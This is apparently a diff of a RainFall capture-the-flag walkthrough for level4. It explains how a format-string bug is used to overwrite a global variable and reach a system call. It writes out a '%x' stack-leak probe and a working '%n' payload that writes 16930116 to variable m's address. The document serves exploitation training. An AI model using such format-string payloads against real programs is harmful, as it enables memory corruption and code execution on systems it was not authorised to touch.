postCC42/rainfall/level4/walkthrough.md

 ## Toward the Solution
 - back to function n, it compares the content of the return of function p with the hexadecimal value 0x1025544, at this line `0x08048492 <+59>:  cmp    $0x1025544,%eax`.
 0x1025544 is 16930116 in decimal.
 If we find a way for function p to return value 16930116n we get true and the system call is triggered.
 ## Finding Buffer Position:
 We first find the position of our buffer in memory by injecting format specifiers into the input string and observing the output.

 `python -c 'print "aaaa" + " %x" * 15' | ./level4`
+- we find `61616161` (4 times "a" in hexa) at position 12 after the output "aaaa" -> the format specifier %x without argument print the content of memory cases.

 ## Manipulating Return Value:
-Once we know the buffer's position, we construct an input string that manipulates the return value of function p to 16930116.
+Once we know the buffer's position (12), we construct an input string that manipulates the return value of function p to 16930116.
 This is done by padding the memory address of the variable m and using the %n format specifier.

 `python -c 'print "\x10\x98\x04\x08" + "%16930112d%12$n"' | ./level4`
 Here, "\x10\x98\x04\x08" represents the memory address of m, and %16930112d pads the address, while %12$n writes the number of characters processed so far to the address pointed to by the 12th argument.